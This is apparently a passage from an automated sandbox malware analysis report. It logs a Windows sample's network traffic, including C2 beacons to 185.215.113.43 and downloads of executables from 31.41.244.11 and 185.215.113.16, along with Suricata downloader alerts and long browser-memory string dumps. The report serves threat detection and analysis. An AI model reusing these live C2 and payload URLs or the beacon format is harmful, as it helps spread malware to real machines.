Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010484001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 30 34 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010485001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.149.100.209 34.149.100.209
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49822 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49894 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49924 -> 31.41.244.11:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006EBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 6_2_006EBE30
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /files/6802601040/SxQyhJr.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/pictureinpicture@mozilla.org.xpi!/experiment-apis/aboutConfigPipPrefs.js equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/intervention_helpers.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST[{incognito:null, tabId:null, types:null, urls:["https://watch.sling.com/*", "https://www.sling.com/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: --autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor*://*.adsafeprotected.com/*/unit/**://www.facebook.com/platform/impression.php*executeIDB/promise</transaction.onerror equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rfc2368/?value=%sisDownloadsImprovementsAlreadyMigratedhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1 equals www.yahoo.com (Yahoo)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", 